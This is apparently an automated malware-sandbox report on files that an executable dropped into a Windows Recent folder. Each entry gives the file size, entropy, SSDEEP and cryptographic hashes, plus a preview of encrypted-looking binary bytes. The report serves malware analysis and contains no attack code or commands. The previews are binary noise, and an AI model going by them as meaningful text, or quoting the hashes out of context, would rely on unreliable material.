                                                                                                                                      Preview:LFOPOC.-.rO...!.T..t...U..P0.r. h.0&.....x.....L|z..Uy.M[.Z..7V_..@o.p:Y+....*.wY...$.$..-....h.L.g.A.....%.9[6..9.E.A..O..h..a.n.... P.q=\.l.4..L(:...`b..sD%..........Q.sX......Hv.b....J.K44.I...P.r.!.m6....X..{.....=.FG..N..)......4..9....?......E...........u.+o....:.."M\....C........t.....9:.6.g7.....S*.........4. 2.R/.*[n.6............x.4..!{.. 5..6A.>.x.$*....+!..F.$.1&:D.X^...e....s.....)MR.r.6G.~.;......DK...._;9.F.~.i..p.$.H.....).....b+.m.IO...>..g@...*.l.\/..N...@.y...j...+.....|K<\.&...!..O..7....f@.K.w#.pr0f......:.H.UT.#.JY:.....T28...A=.[.K.u'.0....z...KB...,w..../. z..o-....)\I...v.w~,..38..L]f...1../...g..R.N`3.A7....(...^.Tru.... ...[f.+4......8.m*.......H.(..4#.....'xow.:......g6I.6c.....r.....>\.r..Pyo&.....<yz?.../.w.l> .._.%m4...A.Z~2E.F+M..7.5...-o|v..G..DO`..."rYx..k.:..@}.7x..3..o.qsv.N..w.>....T.H+S....0pf.2%I{.<z.60.t..b.e......r.....6.w..E8......j.ipH3.wk..V...q|.......M)..l.\.....O2!n...;7.......^*.z-pY..i.aY(A

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848450270212996
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:9qP9HmXr6/rKSHC42Cy5qTCVSccs9nt01V7ZSLvvDIQxTBT6bD:9qVm76/+D4Dy5qTCV/cs9nC1V7ZUvDdc
                                                                                                                                      MD5:096954B3AB0D80949E2771DAC0154822
                                                                                                                                      SHA1:F8C08ABA372222D23B090640A7061DDCB9859C78
                                                                                                                                      SHA-256:40B9EC0192447E51E9B4CCF6F0BDC6ECAAE0F24D7BE97D5C87F6B4B2A2331ED8
                                                                                                                                      SHA-512:1B5A5A1F373CE82CC20D38410A2DDE847B0CBA00DACF57D731651FC2AD41C85883398344E5EAF8D6A5AC7CE19B6ED0C6A91AEE864840BF3C9906DA63F2AF529B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LHEPQx6..'...z.!....E.b.9m....K.Y..+.;".-...#..z,....@.({....o..&..W$`...!.k/..`;.j'K!2...T......ur.......&.bk.*....W}.".. ..r ".Z.to.....w../.g.....m...k..Gg.(....K{h:.K.......vA2w..u.WIn|......J.{....y..zZ8Q'.....?{.i....W5..M.$e.`...p6..D!...|..M#,\w.d.t...?6.(..S.......z"_...?;=.....?.<..i...M..\UpZ..#.4....P........._......P..8^I..G.Z.....F./.....Q...HCx.X....<...j."s.E.:.5.K$.&....a..=.'o.L@!.oU?....a.G...4...........Z^..0....&#..2...o..7../.4A<.a...J6Jt.Z...6J..Q..f.Z.0......u._....ko6eJ..)...e.......?\....a.......T.N..0...q..,c.bW....s....S..O.tW......4T..r.\.B.B..<...e..$..6N.-".dS}...W.$.....6..mJ'..(.....w&....f.R......F.......)..P..Z..n.2...x.k...-C..3E....9..A........>+.....4./....}*e....Nh=7...d...V2*#..)F./...$o..).5....6.....|GN.2..X..MN../....@;...._.......gw......N.s.e+.w.8..E.....+.D-.{=..QT.Y...dV...9..s....wv..H...;....[.r.r.c.4...A6.U.4M2..<....D..v:......T.......b..0...~..>...w...l.C..o'l..vC?...R.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.856708746110962
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:9LAx+37vH7too9FMQ9Za40eKsMWy+b61o0Y78LlK+OlMV5+qkIDbD:9LAxiTtoozMyZj0fN1onKKFKQqD
                                                                                                                                      MD5:95DFBB0D5F875A26B6C0106E7DC5443E
                                                                                                                                      SHA1:4D259102409BEF1E36752E9F28DE15F20517D5BF
                                                                                                                                      SHA-256:3203F8BB7BD7DA9DE5D04626FC811E1E9295C563FC19DB09295D492658C7CEF3
                                                                                                                                      SHA-512:576A7E1C7CAF9F79D3E303205C73C53C7944F7A14CA0AEF406E5783FACA56CCB71DC678D41150D36E9A0466C4F1872983872A7AEBBCB7B49F6BD4A87BB9ED7C9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LHEPQ...>gz...i$......9e......N{...)|.O.*.d.8;L#....O..&.....C..........[.......(<......P..u3..*t....H....&T.|8lN2A..'_p..a..By.K^\.....jd..#./.).k...l.o.a.4.Y3..Y.YM3$.}d .....7.a........=..qH.......$.j~...*.B3..V..+..........4..t..0E..w..=....4._3f..a)J..'j.Y.{..x.........]S.M..;.x..9.. :..h..T.#mgr.QCp..9...O...o.^....f...8C...M...4..1G....AS@-jm..G.....Koj.S..m...]..C.\...#.6.G.G.f..W...k.....j....8...2....0.Y......j?....o.OP..RY!Rz.h..Yx...i...[...?.cb2.4.....Y...Y...%.]GxkS.....hQ..W.......z...........".r.C#j....S.F.}...I....1.T..CP.}..D..~..F...............p..$gu....r.c...fm.........Yp.V....srk...#...m!...5%.:..98.".....\...l....7...!..\;.U4.hz..+,w,0.y.....,9~......#.">..Gf.Wi..j`~..).8C.._...B.....U..8..............e...............*Zup\.....F_8AH....x.eD..[0...}.I.Dx.`z.ZIFf,./...d.RW..,9;.....z..Vhoo..z..y."].....&b.V.@.h..^^.. .]..k~+j.....S+......f....D..*..Z}........RG..|.y.....X.....H....J...7.lbq....Q..X..Y.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.864315073170425
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:S4UQpL1QMhhipIxY/vW5lX2xHdyM65hb2JyGJpOiWqzwtrqpX0QGkRmdZvl8+vdx:tUQpLeMGaxY25h2Zd165IJcph+Z8bq+j
                                                                                                                                      MD5:D20BE54704D2FAA4D883E2D22921520C
                                                                                                                                      SHA1:1CDECFCDC3D8A4F5B63966BF2A6760A437354F61
                                                                                                                                      SHA-256:23587EA0A29C70F425C4EFDF8A776C8E710F894F4EBB31967E73E4B98B1518B1
                                                                                                                                      SHA-512:31125F5D011983B72CDFF73EE545365BF44F9EE4D3381F9CBB456528B2B26784BB1DE7FC536E3F3B530A27BE410FD789FC4E049F308DF5CBD35206A7614722A5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LIJDS_...Z...l...~..I.$.|.....s..k........d....(........n.[...~.U.....K..e.%.p..K.....<...=G...%....:.}....._..'J.mp....\.!.*.B2.....K...i.i...B.e.^.[.X......CF...........D..C..Ym}q..]b.....k~......V.t~....|.......w)rT`)..'...E......FDz.W._.8...d.%.>..a8Q..RY+Y}MY...N5_e.7...A..P0.C_.n.e.....o..@ ...m....#W..&Q#,zp......+,....Q.Fn....'.a.ektN.....Jt..7c.!.V.{..d.!^..Vu...\".....u&../..k%..a..Y*..7...s.^..z.p.UMz..;fd.?...<..>.D...g......._..`.T.......:.C....j...n1`a.....}^.Z..x...y.R.`9....W/uGj.?..'~.b.fZ!Nr..$.'I.\!....A.y.L..O?..U7L..9........xA.'^.........(..9...Y..g...I.6.........."....).V.x.fH(......p.a........4s......0...Vx%.x?...;...L...*o......F.j...# .....`...A.~..z...i..`.@i..7.H..Z'.K2#}X..O7V..>....x..6....@..4Y....0...(...R..z.?..cZ........4>n......,..>V$$.<WB...CN<fKf.t}...2.{A7z..n..CF....^.;,.....wW....a..I..B.4b..... ....Z..........8..{...@...K=.W.....T.G."..hwB...QX...kU...hr......'J.LA...{.E..U.!..^WQ..:!.1qf.+OG.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWCXBPIUYI.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.86923203516955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:hU84iWQcZXorQ82xT3vhpWHHtSHGmNgBsC+JnwDF0TUfJYikO4rTBG3i4+7bD:a8DcZCm3vbWHEHGmNAhYikOeTBx4+/D
                                                                                                                                      MD5:7EA444D6F0744A7C18387C817E69F6AD
                                                                                                                                      SHA1:22981CA585FEA4FF89BC60CE2B624F5CD38D0971
                                                                                                                                      SHA-256:4825BDA3F60AD37F087E31428F8832FE008C3C4EECE8290CF7AA44FF800C5816
                                                                                                                                      SHA-512:2F1F7C46111FD8409F29DC51DE99000B5AFB736F9319DCEE23EE8AA6E73E18531F7BD8989D7937A5DC8CEF3AE1A42433BDF94907DD500566542B0CDFA2E6947A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB9}.B..\..s.I..w.{..b{..X....v.).C.D....s....8=...z....._a..t..u ...5~.L... ...O.....+.mMY.'VY..1.#:....*........r=.!.WN8Y.p.G...v..=;.D"A.lWd....@O...F.,.T....D..y.0aU.?.. ...Q.....ah~...*..?'...\./.......I#.......XO....4..W.}.V...v'....;.:{.E.Y..g..J.......$.....;.....1~x.....Q........_..b..1..WB..q.5k.u.if....'.C.'B......=..R...~...L.).......\17..~..eS^Kj....`oZ..S..-u....rH...p.f...Bm.WT.J,.J).f.~..@..!..'.q.h..$.4.....q0..b..x...uc...lJ...jW.c.lE...gU.E/..*...a.p.:.hd..U..K......t.qN..$x.N..n.A.[4.*.M.Z..C fb....E.........Gz.....-...o5=w.k..).[H.--pA.a......_4..P.k....i...>:..M.....x...lM^-..-.l....Jm....3.GHv.h..=....6..q..Gs..Y.-...\O...Y.s...]....p;&.y'.?.H...;.O..wyGAn..P.h...`..n..G.e|..k.s-T....wgz.K..i..3j..9=oc.].....~`$...._f8.$. .a="..L......v.-M5h.......w&....G.......z...Lm.Cs.R..{a.6..q.AS.............hn....N.R...m..N%...h.2.~...4....@`MIJ?c.................C;.KG".h..I.'...m._1w..._s.5...;....PM...$....d.O.........

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NWCXBPIUYI.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.835132550026597
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:m8z0HiimIbAvU2V+vZJETJXPpP0VEGifz4Rzo5CDhWIrobD:mkNs2kvZqdXPFWEGaAo5CloD
                                                                                                                                      MD5:47EA6CE64749C1EFA0DC7C96A11A69F7
                                                                                                                                      SHA1:F06A999805A7D375EDB7EB9544558B554F0E53EB
                                                                                                                                      SHA-256:07FF92EC80AA5EDB2FDEA2193CF76CFB437CB930EC32F3D8808FBBF1B155004A
                                                                                                                                      SHA-512:B904C79AB66E757821CB2E7A01C7651394E08C92F46AB4304844C1A8088C7B7E9BFBF48C9637D183B0CA1080968E02C5BBB73DA09188AADD69A7FE19749DB1DA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB.......sC......,dE.,"NT.0..';.4.]..G.64..Ql@..(s..8..&.k..q....3....H.tq..{...EA..pg....(A..hef.a....$"...6+.Ho.6V.........].........*.e.J._.`*{..O.....\..8...];...p.B.s..6..M.E...{#v..h...{..A.P.E_.{..C}........qn2....W...t3.:-..R..l.tv.c...RP.&...Z..i...:.R........$U.tXV.)...B..`..oW.?..4....>.,......@.c......}....M..L...o;QW....../.m.?B...<...J.@=...NF:..7....v.x...R`1....GD-...........a...L..#0.y.`...V|..f....%.........k..*..5.....=y..........ui.h.H......."EN.V..Y....w.....:.M.....Ha...@(..l2....$`r.......=.0.T...F..,..O....%.^..../.4.~CO...q...]H.,....W.......O...bH..O.')...PI..!.].;....G.%*.S].".-....vh. ..m,..R..2....Y..a."..r.5.v...<.....2L+.6..|.....]..|...6)...))8."..'e}J....XK..;.5A......+..C.....8...C......).(.V.L.....p..,......p.KT..uz.Y.s%.._...'.B...q..."Q.b...u.=.k...y.........k....o ..3...........s3.$.|..R...p&...Jc7..*.2..Vh.[...S....J.Rn...=....1..5(..?K.....8.H..)a.y.y........>Z.SU.Cg.%..p%.#T2:...y7..Z...)

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NYMMPCEIMA.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.828028315167497
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:vrN7kQrmWJWSm4lq7nYt3IYm3OrhSKB8Q0jJ58SyiaN/ingEJeS3YibD:vq0Jx8A4YvhAj0SD3ngseSIwD
                                                                                                                                      MD5:05C3A68B2A7349EAF29C65C9CBABA8AC
                                                                                                                                      SHA1:605378A6B198F2CA9A4A8631FD99DE6C2B1033FC
                                                                                                                                      SHA-256:C4FFCB224A8067EDACD011E12709685568FA16C86E2D407F298C484C874BDBBF
                                                                                                                                      SHA-512:5F301193CAF1DC47641B3FE9105BE41A85DA5CC72C2B0AD7383102B181CBDA97282F4B49A1E2276D439AA5DA857DF377720F8A20C7A249BB1BA64CC1E88965BA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP. 16...Q....y.'.h.=....F..U..x.!..,6...U<....@P..S.Te..7..V.....LR!.X..I(;..S.tD....X.R.u.J}...e....iS....L.pH.F.P(P......rvZH._<p..D3...D....x.o.j....dP.A.%U..b.3G...n...>....h.|.n..La:.6. m.x'..N5'+\).]....B.<..x.|..4}..qF.U=X).Sj.-..Y..t..).....m.P5..n.u(.....F@y..(aT.I...2.U...x.+.4..>`.`d.....~....k-V.&....$.gnxjx.|G|...S.6..n...J..`..h.........1d..(.. @.2......rW.+..!q.........i._.a.P..[../.>.@.M.v9.....Q..f..Q..F...Q..U.[..KJ&.B....s..}9.}$..*4&A.kCo.x..E6gY:.h.?l..4.F.b{D.....U....EQ..e..Fy...|Y.....Y.........H...-...=.r....Mb-..>2k......*w....*<~...2../....T....4Z_....m..'J..K6...3...M..-..Y..t&[[*./........ =8.>Y-..9"E<D.....OS;p...w.&.:`. ..N.V.p..I.C.h..#.4:.....i..X.....n.a..h.8....4F..De.6*.".f..p.M..Z.>W.M.fh...{xR. ....i..\....~..n...*..<.d. ..4.>.R6.[. {FA}I.z^.]..K.~BwI....X.....s.A.......X....T.f?.QQu.2].V.ZU...i..V5q.U@vo..Wm.#.R.,mFH.).&[>..N..........@.........=Yxo.\d......N....$..WX`..TT...._.?.P.y.\9.=.."?.P]Fa.r.`.=.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NYMMPCEIMA.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.86377864378953
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:uSG132I1ueQ2eJUfY4NPT+V1WeJVxSWUQ9PLqtf3PQobtRZQA/oh5Nmx3x7bD:m99H/eJw5NP4WcSoLcf3Yob9T+Nm3/D
                                                                                                                                      MD5:4162F3614241BBDA9D7941E9930B928B
                                                                                                                                      SHA1:AB89D1E0CFC35614F0AE8BCDFB8EE1B2F1DDB9A8
                                                                                                                                      SHA-256:147C517DBA7762D77E44CD36113E6027B42CB8C6A3DD138E8A4DEC42AD78ACAD
                                                                                                                                      SHA-512:403280A12EA50E48EF4815B0C42581F6AADAEDC1DEA817A8FA0C6CE18B0613655B44D991C53BCA3B96687F9DE9C9F281F9BA61C5F73D299FC04E4F03AF14CF1E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP.e..q..aH.........I.\...}...Q..r....r.A.ORn.....J.u.Z..I,.Q.e...7.P...[3|D.\..gjY...b.j...b...m;.W.]...%W.W..'........>:.d.)M...~#...%..=..a.ts.B..83D0...{.K..F..U.^..:....#2...6.#..EY<.}............{[.w&,.@.........7.....7...3.D.4.#.F.).6.i.iH.,.Z......b.V${".u.1}<.K..u...A..#.^...5&^..;..^.........w.N..]44.g.gY..&.s../..A.G.&#.q5.Y.G08..P..F.0GL.'Q....],.rhY..y.c..^."c..0lf..2/]. p..Yu.....g.....$s8..`..E..|..*.........L/...]u-Q..`!.jIy9.6.?.&f;I,d.0...D.>3x..Q.#.@b.G..{o..*r*M.+.|C..L?*.aR.l....2>.......4...BM......(J.....r.UX..7.`N...[.4...d..U.&..+..F.R.Sb.5.../.>I.d......Z......9.ku......5'....s..a..,}(.....g..2+0....f.j:.R...v.kh......{.B.....^.:?..2.9`..T.,9.-.Rk...m..i*...f..et<..a...z.M.+O.:N...b...2p%.^.].kL.xFX......v..lA......I...z).7'.8..!=..'....1k$..DT(.ev.~...&k..F..D4.p..(.cr*..e.7.......O....;....2....@.N\d.Z...Q..!....)..)..!..D..x..?...H...1@jy..>2X.!...'\S....AT.b.p..v.....x.HQ...|...,...)m...?..1.\.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCOILOQIKC.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.860296936464342
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:7rju0h5lc5Wu1kTkqKyJdrus5PDkxNO4u5E2Mlinfiw0fQuoqTIp4Pl81bD:CWvXktyBLlkxNOvfMqViQuoqUWPl8lD
                                                                                                                                      MD5:C54E82D623107A7050B13F92A8B7D7DE
                                                                                                                                      SHA1:A7B962B68F36E28DB46090BD16CE112987D1A3E1
                                                                                                                                      SHA-256:2222994B3720BBFCC38B948F745EF4BC05FC33D07AEEDE188958FD345C41F10F
                                                                                                                                      SHA-512:435B1B796D4144D95443C9724FF3011BF7A886F106D3A92345A055AC215EBAEE7137D1C19C2AB9A4127D19A70CC8385D5B1933DCFD615932E611CB13D88FA7B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL|l.U.....AFia.).E.$[c...d..u^.8=..B.P..VP...NI..B...(.....l.....lu!...i.9K..j..j/N..y.d!..w.......#4....Mh...|?......IB..2.........=..H.4E..P.?.....e...<L..7_....A..=M..Z.Q?B.@@...v(...w..bY.C..(.f.....A.,...4;|.b..........h.%..t..B........8)..t6..%..k...<.VN{...t%.<C,........Li..x...z..8..T5.Ha.R...... ...+$(.....GL..,.w.V.V?(X.S^r........\..Ai.........P..H.....~o....jT.M#....A_..:.#D......H{..I?$...C2.o.X....d.......NeD....!...}6...U.+P...$....U..*j.fQ.....o..3.Qs..o.y@!0..........M.!.Nxh....s!(.....]..t2..=......t......|..0q..n.0>.d....v>i....:.......Mk..odTI8.n.:_.t..|8Q..|'/.DT2......;.6../...7nIg.m^...._..0.S.....!....'.9....[s...b...Q.[Y.1..X....9.2....E%.....m.Z.x..s.M..Mi.y'@n[?.0..L..-.}!.&p>=f.*.vY..|S..=8...q..h. ..).@../j...%.\..........^.....SDB.'85.M.F.=@L.].M............6l.'.mV......7.7.h../8.h..O{..u.,.V..).7B.5I...6...........<%.*....'...9..c..z..%..:...........|4..J!.......b..l.@.G.F.8.D... 6.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UBVUNTSCZJ.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:HIT archive data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8504875818617235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:/5cuz+sD9jG4fu/uaCaLCDBuE1s/jz8+4roDTwiipXuUsO9TuHu0vR1sm7bHQUpP:/uuz+sD9lu/ua3+YVIvcXwLBuUswaH1F
                                                                                                                                      MD5:DCAE1B86381AB0DEC81D95C7E3036040
                                                                                                                                      SHA1:4FB4DFF3A801FB9199476BE3F72DBC96A04E96A5
                                                                                                                                      SHA-256:051A538ADCD516D8F312F5D74EF3F1A060B344D06BD42CFA1532D6145F133D13
                                                                                                                                      SHA-512:91D57BB66C6D24C8E93122F379D0EB3FACD9F1690DBCA19791DC316F6DC062EB15B50710AA91F571630C9D66712999DC4CF218969A5B2D8D0214EEF32B331AAE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:UBVUN........v.[.vy\R5.B<=e..3"...m...q%.H.A3u..~. ze.^b#.....4.hq...3=.V.+jN...wH.$.)OM.....+...C7%..}..\I.C.hQ'../...e.S.= .dr|&_ C:...M..x..8kK!.....`.;G...9o.T.rq.f..KI.....}.<u!.J..R...5.....I.y.crzzl..<D.5......C..$....-+=.]...c%.M.L`...@.@+.1..x8.i.\n.U.^.l.a...<.{j.....;*p..A'ia2..o;...>J.)...P.....>......*b...M.g.z.2.8`.P)...h.;.....j...;z.P..~.8...3.Il..B5.|....$&)9,......\..f..Z.E..}.....].%....cGi..(q.j...*............g....eo.*....Yj(6....a....Mb.6.........U.._.3..H..PB..P.5..I...D4_.R....,....e.!|.2..PQr&.....I$0.X..2St^..!U|...Sd.e.A....0...V%|DS....p...S....9}..hcC.Y..?...BY..r...Z.=.{I...y.G4...).E.b..<w...e........x..+Y.-.A..7.?...t..S..4.yO.....@g...X.....r.....Kkc..Z.=...Xh.c.[..+..[.~...#.2.*..KE_...5,.-i..1..`.`...I.bc...oSt.....S.X.7.~.....0+..Yf...~.d....b.......r5x...kY.5m...3...e.&x.].......W.B:.*.8.M..D..4..E..;....c.h.J.CU../r.oQVF....b*.F.....4-.9.....x>R..7......5...D...[<....$C...._..)V#.\.KL.q@m9.}..=...7;...

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.850394328626695
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:KxK8VQmv4RvwcPq8HC1LzdcrxsKdEZ98kmDXZB5lcUOLn+zP0guYcfCEdZbD:ypSk4lfitzdWsZZTmbZ3iUI+QAca8D
                                                                                                                                      MD5:11FE3C02EE6AA39F0C2672CAA1C62DFD
                                                                                                                                      SHA1:C03D5F193677D714268B699BC06695000B172767
                                                                                                                                      SHA-256:9F376BAA82E77FAD05CE9A7A1D520FB643FF010A51DCBD2F5E8831B4351558F5
                                                                                                                                      SHA-512:6FF0D70076D1E0C8E670E1AE833E11F1C7FDBDCBC3577A10D03D25CF03812B5AD451831D34CDCD50EDDE40596EB8173BB1E92A8FD995FA341724729E62F802A6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFP......i-....6....P.......'...?..I.#4.xI..F!.ADf........e.#....*|X#Nd=j......OT.m&..........D.x.7hsf....Q...P..3..QI.b}.lv.j.l...qq.wp...2s...ik...W..\.....`n..5h.v.^X[JWj.AD..%....d......?u...-.=.B;..Q.Q..A.Y.$A....w...d.g.O]...^..wr.S........{.FR5k..@.|....w.t.bM.....a..Jw...&..@..Z.1F$BN.....].'MH.s..p.....l.]..Z_..B....C../r..4.D=^..>.......3Ce(....P..L.&S.+.s.~....@6.....i..H...e.P...E.+.;..R....bJ.I...L..?....$...I.h/8......t....l.....+.K..k...<...v.f=Tn.....b.>..f..&0Y%...d....,~].......;..;{t...H....c...Qr..A....).........S.xtT..e.....e.\.f..._c.Wmu.x..,.....@i.h..QZ.j......ED....f........Z...Pv.2.f.O.....!..(...D]..R...6..."..X[...o?8..v.1I^.....K.Ffe3...Z.[.!/..iY`l...'............:.P.~xk...<.8V............l)..\./.~...I...e..]l;\.O>f..tE..kJ....t.]...D.Q....o..bP..r..e.D..VON.,O......!}\..D.4.p.2.X..Bw;.\.-.!.|..=......#....c.K. @..i..lRt...:..2.Sv...D..*P..>..\S...s..0.l...\..=.0..<#S~.....V.$M..Qa.a.v...........OZ.Y|.Q.|.....

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZIPXYXWIOY.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.823419923875632
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ZMIdCH9IT/ZpKnqT5FnjHWgwmWMXJ+gTcNWwOiREwK8l9Tf/ybD:RCH9q/KnqP2NAXJ+gi7OiiwK5D
                                                                                                                                      MD5:01D49AE747706038260786BB4BA819C8
                                                                                                                                      SHA1:C83BBCF18F29D2D6FA16FA415ECADF33CD3522CD
                                                                                                                                      SHA-256:B2D6D4D048DB57FC1E0D411F3D3C6029D47371482BC42883AEBF359CAD0D1611
                                                                                                                                      SHA-512:E5174231ABF5A7028B6980C35A1D7C8E8E541B61DE6ECC583F920CC95F980B330B075E1132DDFAD67CD188728310F3521B3DF99D45CB07FC9D82EEDC7AA65A33
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY...bU>.=.\.....4.|...+......5-X.D..{......o.p.................e9@8'...v&.......*4..+..T~6....7X/.f5.\..%..+.7&.....3.....vl-....5R..(.11.T62.......V..6..N.s}..R.Kb....k\..g.X....gy.R..=j.(..X..Zn.s.-.....F3.u.[..5X!.'...Z.....X....<... +%..cv.]YK.Y......g..".19....+...SsP...7 .t-l0X...,..$.....G...I.w.........D.t@..[.5.#.@S3-.{.l..evC.V>......-.R.0..........X.........2...}j.J..\.<.t....}.e5...R.Oymc{."5S.l..V..C..YI..rQ3.P.9j..t.$..j... ...Vv...i+rtt4..L).E.Lr.d........[..Eq.@r..*@.E.$g.,m1...6E.../4L...M..".wa.Hud.z9..u...i........^..*.%...8.0i..&m.[.N....".c.....$4O..g.2?.d./.G....../......\...UZ.*.;...}.e.A.~1..%D... ..@'`..M.8... 8m..Gx`...}b.nb.........e{.+(..#HWqT....3...~y...0......0Z9.2p...F...czEk.DQ...W.3.2...@.0....8....V^........2i)..s...q...k.......=?..U.>...........h.s4..J*..&O.o...u ....9.4...M..!@2W.*e5..Pr....V.6.1O..J..5..........V.f.n.$./.3.,.:.(....;W=....8..)r..G.U`.^.[.9...`..:....ad...5..D..&.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZUYYDJDFVF.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.84556529208704
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ayHKXDnTdu4pU/zikJSnyPwyHacNFsz5Lw2L7HgaonGvnWUbD:ayHsDTdjpSikInyPlLFs1FzoGdD
                                                                                                                                      MD5:C9F601990BE7D5211D4740E4B64A6ADB
                                                                                                                                      SHA1:C51D8F91ED3656FD476DCFD5EAD0118C729EAACA
                                                                                                                                      SHA-256:298CC7AEF85043ECF280172DEB0F5690C2FB93F1E57E207DEB06F1CD12B02471
                                                                                                                                      SHA-512:71642177FBD71D92C1A5794CACB73A04DAEB04473414B5EE7E6260232C66C353F643219E4510A6248A34A3284BA5557C22AB7C4AA70EE6B0A65DA87CB76C7D63
                                                                                                                                      Malicious:false
